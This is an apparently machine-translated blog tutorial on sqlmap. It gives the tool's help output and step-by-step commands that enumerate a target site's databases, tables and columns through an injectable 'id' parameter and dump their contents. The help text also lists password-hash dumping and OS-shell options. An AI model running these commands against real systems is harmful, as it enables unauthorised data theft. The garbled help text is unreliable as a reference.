SQL Injection Tool: Sqlmap command

SQLMAP is a professional SQL injection tool that lets you say goodbye to manual injection, efficient and automated program injection

The premise is that you have found the injection point, the official website of the tool: http://sqlmap.org/

Kali system is installed by default Sqlmap, no additional installation is required:

Sqlmap command-line help:

___ __h__ ___ ___[.] _____ ___ ___  {1.1. One#stable}|_ -| . [,]     | .'| . ||___|_  [']_|_|_|__,| _||_|   V |_| http//sqlmap.orgUsage:python Sqlmap [options]options:-H,--Help Show Basic Help message and exit-hh Show Advanced help message and exit--version Show Program'S version number and exit-V VERBOSE verbosity level:0-6(default 1) Target:at least one of the these options have to is provided to define the Target (s)-u URL,--url=url Target url (e.g."http://www.site.com/vuln.php?id=1")    -G googledork Process Google dork Results astarget URLs Request:these options can used to specify what to connect to the target URL--data=data datastringTo be sent through POST--cookie=Cookie HTTP Cookie Header value--random-agent use randomly selected HTTP user-Agent Header Value--proxy=Proxy use a proxy to connect to the target URL--Tor use Tor anonymity network--check-tor Check to seeifTor isused properly Injection:these options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts-p testparameter testable parameter (s)--dbms=dbms Force Back-end DBMS to Thisvalue Detection:these options can used to customize the Detection phase--level=level level of tests to perform (1-5,default 1)    --risk=risk risk of tests to perform (1-3,default 1) Techniques:these options can be used to tweak testing of specific SQL injection techniques--technique=tech SQL Injection techniques to use (default "BEUSTQ") Enumeration:these options can used to enumerate the back-End Database management system information, structure and data containedinchThe tables. Moreover you can run your own SQL statements-A,--All Retrieve everything-B,--Banner Retrieve DBMS Banner--current-user Retrieve DBMS Current user--current-db Retrieve DBMS current database--Passwords Enumerate DBMS users password hashes--tables Enumerate DBMS database tables--columns Enumerate DBMS database table columns--Schema Enumerate DBMS schema--Dump dump DBMS database table entries--dump-All Dump all DBMS databases tables entries-D DB DBMS database to enumerate-T TBL DBMS database table (s) to enumerate-C COL DBMS database table column (s) to enumerate Operating system Access:these options can be used T o Access the back-End Database management system underlying operating system--os-shell Prompt forAn interactive operating system shell--os-pwn Prompt forAn OOB shell, Meterpreter or VNC General:these options can is used toSetsome general working parameters--batch never Ask forUser input, use thedefaultbehaviour--flush-session Flush Session Files forCurrent target Miscellaneous:--sqlmap-shell Prompt forAn interactive sqlmap shell--wizard Simple WizardInterface  forBeginner Users

Enumerate the list of databases:

Sqlmap-u http://URL address/index.php?id=1--dbs

According to the database, enumerate the database tables:

Sqlmap-u http://URL address/index.php?id=1-d database--tables

Enumerate the data table structures according to the database and database tables:

Sqlmap-u http://URL address/index.php?id=1-d database-t database table--columns

Enumerates the table data according to the database table structure:

Sqlmap-u http://URL address/index.php?id=1-d database-t database table-c database table name 1, database table name 2--dump

NONO
Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open Source Blog: Http://www.github.com/sqqihao
QQ: 287101329
: 18101055830

SQL Injection Tool: Sqlmap command